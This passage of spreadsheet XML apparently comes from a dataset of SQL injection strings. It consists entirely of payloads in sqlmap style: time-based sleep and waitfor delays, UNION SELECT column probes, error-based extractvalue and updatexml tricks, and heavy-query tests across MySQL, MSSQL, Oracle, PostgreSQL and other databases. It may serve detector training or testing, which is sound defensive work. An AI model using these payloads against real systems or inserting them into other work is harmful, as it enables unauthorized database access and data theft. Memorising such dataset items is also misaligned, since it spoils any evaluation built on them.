    <t>1'  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1 where 3410 = 3410 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-7293'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>-1910' or 2624 = 3371 and 'umoy' = 'umoy</t>
  </si>
  <si>
    <t>1  )  )   as tnhy where 1874 = 1874 and 2858 = 7324#</t>
  </si>
  <si>
    <t>1 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  # tqmr</t>
  </si>
  <si>
    <t xml:space="preserve">1  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) </t>
  </si>
  <si>
    <t>-6030%' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  as kndn where 9314 = 9314</t>
  </si>
  <si>
    <t>-5439" or 2559 = 4692 and "dcrf" like "dcrf</t>
  </si>
  <si>
    <t>1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'rqyz' = 'rqyz</t>
  </si>
  <si>
    <t>1"  )  )   as hkrh where 3060 = 3060 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "wrbs" like "wrbs</t>
  </si>
  <si>
    <t>1'  )  )   as grne where 9003 = 9003 order by 1--</t>
  </si>
  <si>
    <t>-5534 or 1983 = 5721#</t>
  </si>
  <si>
    <t>1'|| ( select 'gwxc' from dual where 3626 = 3626 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7786'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1" )  where 2656 = 2656 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  'frpo' like 'frpo</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as msug where 3503 = 3503 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-6165%'  )  )   union all select 5384#</t>
  </si>
  <si>
    <t>1'+ ( select wpai where 3685 = 3685</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 70 ) ||chr ( 106 ) ||chr ( 78 ) ,5 )  from dual--</t>
  </si>
  <si>
    <t>1 )  as jqbp where 5407 = 5407 and 4595 = 4595#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( "%" = "</t>
  </si>
  <si>
    <t>-1485'  )  )   )  union all select 7661,7661,7661,7661,7661--</t>
  </si>
  <si>
    <t>1'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'hfqz' = 'hfqz</t>
  </si>
  <si>
    <t>-8753 )  order by 1#</t>
  </si>
  <si>
    <t>if ( 1087 = 5839 )  select 1087 else drop function zzeh--</t>
  </si>
  <si>
    <t>1" )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "ikaf" like "ikaf</t>
  </si>
  <si>
    <t>1  )  )   as sipp where 1999 = 1999 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1'+ ( select ijoh where 7145 = 7145 order by 1--</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'xzcr' = 'xzcr</t>
  </si>
  <si>
    <t>-2448%" )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1  )  )   as gygm where 4024 = 4024</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as nhkp where 8030 = 8030</t>
  </si>
  <si>
    <t>1'|| ( select 'qgnz' where 6446 = 6446</t>
  </si>
  <si>
    <t>1 )  where 2734 = 2734 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-5579%" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 1473 = 1473</t>
  </si>
  <si>
    <t>1'+ ( select 'uijv' where 7279 = 7279 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'leok' where 4320 = 4320</t>
  </si>
  <si>
    <t>1'+ ( select 'jtvq' where 8288 = 8288 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'cfff' where 4994 = 4994</t>
  </si>
  <si>
    <t>1%" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9672'  )  )   as rupb where 8218 = 8218 or make_set ( 4954 = 1836,1836 ) --</t>
  </si>
  <si>
    <t>1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 where 1776 = 1776 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-4764"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>-1030" where 2161 = 2161 union all select 2161,2161,2161,2161,2161,2161,2161,2161,2161,2161--</t>
  </si>
  <si>
    <t>-1351" where 6968 = 6968 or 5684 = 8582</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 5877 = 5877 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'jicq' like 'jicq</t>
  </si>
  <si>
    <t>1%" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select taga where 8036 = 8036</t>
  </si>
  <si>
    <t>-7423 or make_set ( 9354 = 9354,7185 ) -- hprc</t>
  </si>
  <si>
    <t>1" )  where 6311 = 6311</t>
  </si>
  <si>
    <t>1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "kfps" = "kfps</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) </t>
  </si>
  <si>
    <t>1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'nuis' = 'nuis</t>
  </si>
  <si>
    <t>1'  )  )   as xpmy where 5274 = 5274 rlike  ( select  ( case when  ( 6252 = 7704 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'mabd' = 'mabd</t>
  </si>
  <si>
    <t>-1985  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1 where 7224 = 7224 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' rlike sleep ( 5 )  and 'cugs' = 'cugs</t>
  </si>
  <si>
    <t>select  ( case when  ( 9318 = 7198 )  then 9318 else 9318* ( select 9318 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-1263" )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 4976 = 4976</t>
  </si>
  <si>
    <t>1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'kird' = 'kird</t>
  </si>
  <si>
    <t>-5622" where 7970 = 7970 union all select 7970,7970,7970,7970,7970--</t>
  </si>
  <si>
    <t>1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'fnjm' = 'fnjm</t>
  </si>
  <si>
    <t>1%' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "tfrs" = "tfrs</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or sleep ( 5 ) </t>
  </si>
  <si>
    <t>1 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-4960' )  union all select 5300--</t>
  </si>
  <si>
    <t>1 and 5934 = 7745</t>
  </si>
  <si>
    <t>select  ( case when  ( 3537 = 5218 )  then 3537 else 3537* ( select 3537 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' where 2547 = 2547 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-5672%" or 3825 = 9675--</t>
  </si>
  <si>
    <t>1'|| ( select 'miew' where 8360 = 8360 waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>1' in boolean mode )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) #</t>
  </si>
  <si>
    <t>-6588' where 7793 = 7793 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1 )  as kaew where 2658 = 2658</t>
  </si>
  <si>
    <t>1 )  where 6990 = 6990 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-5379' )  union all select 4294,4294,4294--</t>
  </si>
  <si>
    <t>select  ( case when  ( 9667 = 6212 )  then 9667 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "uqor" like "uqor</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-8924  )  )   as jybr where 7901 = 7901 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>-9531'  )  )   )  union all select 4076,4076#</t>
  </si>
  <si>
    <t>1  )  )   as huxq where 7451 = 7451 union all select null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-8777" )  as lalf where 8606 = 8606 or elt ( 4397 = 5823,5823 ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   as ktue where 6392 = 6392 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>1' and sleep ( 5 )  and 'usgv' like 'usgv</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'jueq' = 'jueq</t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' and  ( 3020 = 3020 ) *6703 and 'tmng' like 'tmng</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( "nuix" like "nuix</t>
  </si>
  <si>
    <t>-9596 )  where 3425 = 3425 union all select 3425,3425,3425,3425,3425,3425#</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>-1998' )  as kgvf where 2346 = 2346 union all select 2346,2346,2346,2346,2346,2346,2346,2346,2346--</t>
  </si>
  <si>
    <t>select  ( case when  ( 9732 = 7136 )  then 9732 else 9732* ( select 9732 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-8002'  )  )   )  union all select 6647,6647,6647--</t>
  </si>
  <si>
    <t>1" where 3227 = 3227 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-3862  )  )   as vqtl where 9629 = 9629 union all select 9629,9629,9629,9629,9629--</t>
  </si>
  <si>
    <t>1 or elt ( 6272 = 6272,sleep ( 5  )  )  -- ilfc</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 2394 = 4530 )  then 2394 else 2394* ( select 2394 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( "ipqw" like "ipqw</t>
  </si>
  <si>
    <t>1'|| ( select 'cqjw' from dual where 7335 = 7335 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1' where 5004 = 5004 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-6095' )  or 6872 = 6872 and  ( 'bfwm' like 'bfwm</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and 'swke' = 'swke</t>
  </si>
  <si>
    <t>-3326'+ ( select xitp where 7621 = 7621 union all select 7621,7621,7621,7621,7621,7621,7621,7621,7621,7621#</t>
  </si>
  <si>
    <t>1"  )  )   as rfgu where 4880 = 4880 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3179'+ ( select 'tzzz' where 3191 = 3191 union all select 3191,3191,3191,3191,3191#</t>
  </si>
  <si>
    <t>-8364' )  union all select 4732,4732,4732,4732,4732,4732,4732,4732,4732#</t>
  </si>
  <si>
    <t>1'  )  )   as hfra where 6500 = 6500 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-2226%"  )  )   union all select 1018,1018,1018,1018--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 5462 = 8866,1,1/0 ) </t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   or sleep ( 5 )  and   (  (  8285 = 8285</t>
  </si>
  <si>
    <t>1  )  )   as gxvp where 3865 = 3865</t>
  </si>
  <si>
    <t>1" )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "piya" = "piya</t>
  </si>
  <si>
    <t>-3501'  )  )   )  or make_set ( 7122 = 6158,6158 )  and   (  (   ( 'mlfl' like 'mlfl</t>
  </si>
  <si>
    <t>1  )  )   as jrzr where 5194 = 5194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-2351  )  )   as xdqn where 4019 = 4019 or 8571 = 8571--</t>
  </si>
  <si>
    <t>-9950' or 4425 = 1975</t>
  </si>
  <si>
    <t>1 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- gynj</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'cwuy' = 'cwuy</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from generate_series ( 4990,4990,case when  ( 4990 = 5065 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>-2925%" or make_set ( 9354 = 9354,7185 )  and "%" = "</t>
  </si>
  <si>
    <t>1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'ayol' = 'ayol</t>
  </si>
  <si>
    <t>1' and make_set ( 2942 = 8200,8200 )  and 'jnhv' like 'jnhv</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-1236'+ ( select 'fbgh' where 3896 = 3896 union all select 3896,3896,3896,3896,3896,3896,3896,3896,3896--</t>
  </si>
  <si>
    <t>-9871 union all select 6094,6094,6094,6094,6094,6094,6094#</t>
  </si>
  <si>
    <t>1%' )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as vuzt where 4971 = 4971</t>
  </si>
  <si>
    <t>1' )  where 1323 = 1323 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 9255 = 9255</t>
  </si>
  <si>
    <t>-8341 or 8571 = 8571--</t>
  </si>
  <si>
    <t>-9076'+ ( select lqvj where 8551 = 8551 union all select 8551,8551,8551,8551--</t>
  </si>
  <si>
    <t>-6370'  )  )   as sims where 9388 = 9388 union all select 9388,9388,9388,9388,9388,9388,9388,9388#</t>
  </si>
  <si>
    <t>1'|| ( select 'uqbj' from dual where 6736 = 6736 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-4347' union all select 6074,6074,6074,6074,6074,6074,6074--</t>
  </si>
  <si>
    <t>1'+ ( select 'lpkv' where 8760 = 8760</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( "staz" like "staz</t>
  </si>
  <si>
    <t>1' )  where 9175 = 9175</t>
  </si>
  <si>
    <t>1%' )  and  ( 7704 = 3494 ) *3494 and  ( '%' = '</t>
  </si>
  <si>
    <t>-9318"  )  )   )  union all select 5223,5223,5223,5223#</t>
  </si>
  <si>
    <t>-4785' or  ( 8459 = 8459 ) *4906 and 'esfn' = 'esfn</t>
  </si>
  <si>
    <t>1'|| ( select 'xyft' from dual where 8250 = 8250 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'rsgi' where 2258 = 2258</t>
  </si>
  <si>
    <t>1' )  where 5871 = 5871</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "pxbk" like "pxbk</t>
  </si>
  <si>
    <t>1%" and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'rask' from dual where 9411 = 9411 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>-8429'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 'bwih' like 'bwih</t>
  </si>
  <si>
    <t>1 )  where 5442 = 5442</t>
  </si>
  <si>
    <t>1 )  and  ( 3020 = 3020 ) *6703 and  ( 9831 = 9831</t>
  </si>
  <si>
    <t>1' )  or sleep ( 5 )  and  ( 'mdmr' like 'mdmr</t>
  </si>
  <si>
    <t>1'|| ( select 'glec' from dual where 4846 = 4846</t>
  </si>
  <si>
    <t>1" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "imlx" = "imlx</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 6948 = 4654 )  then 1 else 6948* ( select 6948 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-9122 )  as sdlg where 1546 = 1546 union all select 1546,1546,1546,1546,1546,1546,1546--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( "vabm" = "vabm</t>
  </si>
  <si>
    <t>1 )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 5099 = 5099</t>
  </si>
  <si>
    <t xml:space="preserve">1" and make_set ( 6520 = 9958,9958 ) </t>
  </si>
  <si>
    <t>1 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 7019 = 1998 )  then 7019 else 7019* ( select 7019 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-4669" or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null--</t>
  </si>
  <si>
    <t>1 )  as ndgd where 2367 = 2367 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  as assu where 7521 = 7521 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- mtaq</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  as jrqh where 6204 = 6204 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   as ngoo where 8641 = 8641 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'fbnx' = 'fbnx</t>
  </si>
  <si>
    <t>1%" or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%" )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 9184 = 9184</t>
  </si>
  <si>
